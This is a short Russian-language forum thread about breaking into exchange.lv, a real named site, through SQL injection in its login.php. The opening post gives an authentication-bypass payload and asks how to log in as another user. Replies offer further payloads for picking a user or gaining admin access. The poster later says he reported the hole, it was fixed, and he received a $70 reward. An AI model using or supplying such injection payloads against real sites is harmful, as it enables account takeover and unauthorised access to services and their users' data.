Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
взлом exchange.lv
 
Респект! Тут один вопросик есть..короче,login.php страдает sql-инъекцией:
login: aaaa
password: 1)' or 1=1/*

Можно ли зайти под юзером с другим id? Чисто технически интересует. Какой будет sql-запрос?
Don't be blackhats  ;)
 
попробуй
1)' or 1=1 limit 0,1/*
 
В логине пишешь:
admin'/*
Возможно этот зопросенг даст тебе админа...Можно попробывать другие логины...
Еще вот:
в пароле - 1)' or 1=1 WHERE id=1/*
Аналогичный результат...
За работоспособность не отвечаю, так как это чисто теоретически верные запросы.
 
Спасибо.Я уже оповестил администрацию.Дыру они закрыли.
 
Млин, зачем тему создавал, если собирался писать о дыре админам???
 
Ну,знаешь ли,за то,что взломал и не оповестил,могут и по башке дать.
А так даже премию в $70 дали.
 
Хех...тогда ясно...
Страницы: 1
Читают тему